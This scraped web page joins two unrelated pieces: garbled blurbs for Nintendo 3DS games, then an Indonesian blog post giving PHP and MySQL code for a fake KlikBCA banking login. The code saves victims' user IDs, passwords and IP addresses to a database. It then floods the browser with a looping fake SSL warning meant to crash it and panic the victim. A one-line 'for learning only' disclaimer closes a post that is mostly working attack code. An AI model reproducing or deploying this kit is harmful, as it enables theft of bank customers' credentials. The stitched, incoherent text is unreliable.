Games For Nintendo 3ds

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Resident Evil frightening : The Mercenaries 3D
Super Street Fighter IV 3D
Ridge Recer 3Ds

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Street Fighter IV 3D

We are pleased to announce Street Fighter x Tekken is on his way to the PSVita! As an added exclusive, Cole will be on display from infamous 3 versions on both the PlayStation and PSVita!...

Ridge Recer 3Ds

The Ridge Racer ® series returns to the racing world on fire with brand new features, spectacular 3D stereoscopic visuals, a wider range of machines, new environments, expanded and updated set individually drift mechanics. Ridge Racer ® 3D will be the hottest racing game OnThe Nintendo 3DS ...

Resident Evil frightening : The Mercenaries 3D.

Fight Back hordes of enemies in Resident Evil ® frightening: The Mercenaries 3D, an action-packed exclusively for the Nintendo 3DS. Play mastered as your favorite characters from Resident Evil ® history in re-challenge of Resident Evil ® 4 and Resident Evil ® 5 ...

Asphalt 3D

Asphalt ™ 3D is racing as you have never experienced before! Full stereoscopic 3D graphics and authentically modeled licensed supercars make the most realistic and immersive racing experience yet ...

Pro Evolution Soccer 3DS

Pro Evolution Soccer 2011 3D is a football simulation game from experienced game developer Konami is developed...

Phishing!! Yeah, pasti sudah tahu kan apa artinya phishing?
Kalau belum tahu silahkan check it
Saya akan berbagi coding sederhana php dan database mysql dalam proses overflow. Data Korban akan di simpan ke dalam database, jadi sebelumnya kalian harus membuat database yang sesuai dengan Login Phishing.
DFD Phishing

Ketika korban terjebak dengan login phishing, web browser korban akan crash dan CPU Range Korban menjadi 100%.

Sebagai contoh saya akan demonstrasi phishing pada KLIKBCA

Membuat 3c.php
include “koneksi.php”;
$User = $_POST['UserId'];
$passwd = $_POST['passwd'];
$ip = getenv(REMOTE_ADDR);
$tgl = date(“j F Y, g:i a”);
$query = “INSERT INTO hack (user, passwd, ip, tgl) VALUES (‘$User’, ‘$passwd’, ‘$ip’, ‘$tgl’)”;
mysqli_query($konek, $query); // kirim query ke database
$hasil = mysqli_affected_rows($konek); // cek perubahan data di database
// login.php adalah URL Direct letak overflow
if ($hasil > 0)
header(‘location:../login.php’ );
echo “gagal”;

Membuat koneksi.php
$database = “bca”; // nama database
$host = “localhost”; // nama host
$nama = “root”; // username database
$pass = “haning”; // password database
$konek = mysqli_connect($host, $nama, $pass, $database); // konek ke database
echo “Koneksi Ke Server Gagal.”;

Tempat berlangsungnya overflow, saya namakan login.php
mysql_connect (“localhost”, “root”,”haning”) or die (mysql_error());
mysql_select_db (“bca”) or die(mysql_error());
$over = $_POST['login']; // button submit “login”
$sql = mysql_query(” select * from hack where user like ‘%$over%’ “);
$row = mysql_fetch_array($sql);
// Proses Oveflow, lebih tepatnya Perulangan Pencarian
if ($row > 0)
while ($row){
echo “At “.$row['tgl'].” Secure Socket SSL Invalid. Please, do not process access to BCA Internet Banking.<br>”;
echo “overflow gagal”;

Tujuan di balik phishing ini adalah mencuri informasi korban di balik login palsu dan membuat panik korban. Ketika korban panik, maka ia akan menutup login tersebut dan sang Attacker mendapatkan user login korban di dalam database yang telah disiapkan sebelumnya.
Artikel ini hanya semata-mata untuk pembelajaran, penulis tidak bertanggung jawab sama sekali atas tindakan diluar artikel ini. Gunakan artikel ini sebagai pembelajaran dan memproteksi diri.

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